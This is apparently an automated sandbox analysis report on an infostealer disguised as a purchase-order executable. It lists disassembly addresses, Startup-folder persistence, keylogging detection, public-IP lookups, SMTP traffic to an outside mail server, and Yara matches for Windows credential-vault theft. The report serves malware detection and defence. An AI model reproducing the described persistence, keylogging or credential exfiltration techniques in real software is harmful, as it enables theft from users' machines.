Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: file.exe, 0000000D.00000002.4082643908.0000000006172000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZ source: file.exe, 0000000D.00000002.4062248332.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: file.exe, 0000000D.00000002.4084100623.0000000007B08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: file.exe, 0000000D.00000002.4062248332.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP.oLC:\Windows\Microsoft.VisualBasic.pdb source: file.exe, 0000000D.00000002.4061358219.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: file.exe, 0000000D.00000002.4082643908.0000000006172000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: file.exe, 0000000D.00000002.4084100623.0000000007B08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: file.exe, 0000000D.00000002.4084100623.0000000007B0F000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 4x nop then cmp dword ptr [ebp-18h], 00000000h	0_2_01444769
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_0144AEC0
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_0144AF11
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 4x nop then cmp dword ptr [ebp-18h], 00000000h	12_2_00B84774
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	12_2_00B8AEC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	12_2_00B8AF11
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 4x nop then cmp dword ptr [ebp-18h], 00000000h	13_2_00DB4769
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	13_2_00DBAEC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	13_2_00DBAF11

Networking

Queries Google from non browser process on port 80

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	HTTP traffic: GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	HTTP traffic: GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	HTTP traffic: GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38

Source: global traffic

TCP traffic: 192.168.2.6:49732 -> 198.54.122.135:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 198.54.122.135 198.54.122.135

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.6:49732 -> 198.54.122.135:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.privateemail.com

Source: InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: InstallUtil.exe, 0000000E.00000002.4668693776.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4648647647.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.privateemail.com
Source: InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4648647647.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 0000000C.00000002.4679137122.00000000067F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2566518766.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.4660130188.000000000293C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4062928244.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4659098150.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Drawing specification and June PO #07329.exe, file.exe.7.dr	String found in binary or memory: http://www.google.com
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2566518766.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.4660130188.000000000293C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4062928244.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: file.exe, 0000000C.00000002.4660130188.000000000293C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/4v
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4659098150.0000000002741000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: InstallUtil.exe, 0000000E.00000002.4659098150.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: InstallUtil.exe, 0000000E.00000002.4659098150.0000000002741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Drawing specification and June PO #07329.exe, 00000000.00000002.2566518766.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.4660130188.000000000295E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4062928244.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4648647647.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: file.exe, 0000000C.00000002.4660130188.000000000295E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, SKTzxzsJw.cs	.Net Code: mWXy4
Source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack, SKTzxzsJw.cs	.Net Code: mWXy4
Source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack, SKTzxzsJw.cs	.Net Code: mWXy4
Source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack, SKTzxzsJw.cs	.Net Code: mWXy4
Source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack, SKTzxzsJw.cs	.Net Code: mWXy4

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Code function: 12_2_0910A848 CreateProcessAsUserW,

12_2_0910A848

Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_01444769	0_2_01444769
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_01448819	0_2_01448819
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0144AEC0	0_2_0144AEC0
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_01447AD8	0_2_01447AD8
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_066F10AC	0_2_066F10AC
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_066FD4A8	0_2_066FD4A8
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_066FD498	0_2_066FD498
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_066FAB24	0_2_066FAB24
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D6E3F0	0_2_07D6E3F0
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D61140	0_2_07D61140
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D6C144	0_2_07D6C144
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D96AB8	0_2_07D96AB8
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D9C210	0_2_07D9C210
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_08702388	0_2_08702388
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0870A6B0	0_2_0870A6B0
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_087069B0	0_2_087069B0
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0870C2B0	0_2_0870C2B0
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0870C29F	0_2_0870C29F
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_08702363	0_2_08702363
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_08711408	0_2_08711408
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0871B13F	0_2_0871B13F
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0871C6E0	0_2_0871C6E0
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_0871C6D2	0_2_0871C6D2
Source: C:\Users\user\Desktop\Drawing specification and June PO #07329.exe	Code function: 0_2_07D61127	0_2_07D61127
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_00B8823C	12_2_00B8823C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_00B84774	12_2_00B84774
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_00B8AEC0	12_2_00B8AEC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_00B87B08	12_2_00B87B08
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_06310B84	12_2_06310B84
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0632F050	12_2_0632F050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_063210AC	12_2_063210AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0632D4A8	12_2_0632D4A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0632D498	12_2_0632D498
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_06320006	12_2_06320006
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0632AB24	12_2_0632AB24
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0674A6B0	12_2_0674A6B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_06742388	12_2_06742388
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0674C2B0	12_2_0674C2B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_06742362	12_2_06742362
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_06751408	12_2_06751408
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0675B153	12_2_0675B153
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0675C6E0	12_2_0675C6E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0675C6DF	12_2_0675C6DF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079CD788	12_2_079CD788
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079C1140	12_2_079C1140
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079CE666	12_2_079CE666
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079CF530	12_2_079CF530
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079CF520	12_2_079CF520
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079CD778	12_2_079CD778
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4E328	12_2_07A4E328
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4C718	12_2_07A4C718
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4EA51	12_2_07A4EA51
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4F720	12_2_07A4F720
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4FAA0	12_2_07A4FAA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4FA91	12_2_07A4FA91
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4D6E9	12_2_07A4D6E9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4E2DF	12_2_07A4E2DF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A42E78	12_2_07A42E78
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A42E45	12_2_07A42E45
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4FCC8	12_2_07A4FCC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4FCD8	12_2_07A4FCD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4F420	12_2_07A4F420
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_07A4F430	12_2_07A4F430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09104D28	12_2_09104D28
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09108978	12_2_09108978
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_091035C0	12_2_091035C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_0910AF28	12_2_0910AF28
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_091056F5	12_2_091056F5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09104D18	12_2_09104D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09100D1F	12_2_09100D1F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09100D20	12_2_09100D20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09104558	12_2_09104558
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09109178	12_2_09109178
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_091035B0	12_2_091035B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_091001D8	12_2_091001D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_091001CB	12_2_091001CB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09100013	12_2_09100013
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09103860	12_2_09103860
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_091074D0	12_2_091074D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_091074E0	12_2_091074E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09103EF0	12_2_09103EF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_09103EE0	12_2_09103EE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 12_2_079C1127	12_2_079C1127
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00B501F0	13_2_00B501F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00B51AB0	13_2_00B51AB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00DB4769	13_2_00DB4769
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00DB8819	13_2_00DB8819
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00DBAEC0	13_2_00DBAEC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00DB76B8	13_2_00DB76B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_00DB7AD8	13_2_00DB7AD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_064A10AC	13_2_064A10AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_064AD10C	13_2_064AD10C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_064AD498	13_2_064AD498
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_064AD4A8	13_2_064AD4A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_064AF053	13_2_064AF053
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_064AAB24	13_2_064AAB24
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D0D788	13_2_07D0D788
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D0E637	13_2_07D0E637
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D01140	13_2_07D01140
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D0D778	13_2_07D0D778
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D0F530	13_2_07D0F530
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D0F520	13_2_07D0F520
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D78B88	13_2_07D78B88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	Code function: 13_2_07D7AF20	13_2_07D7AF20
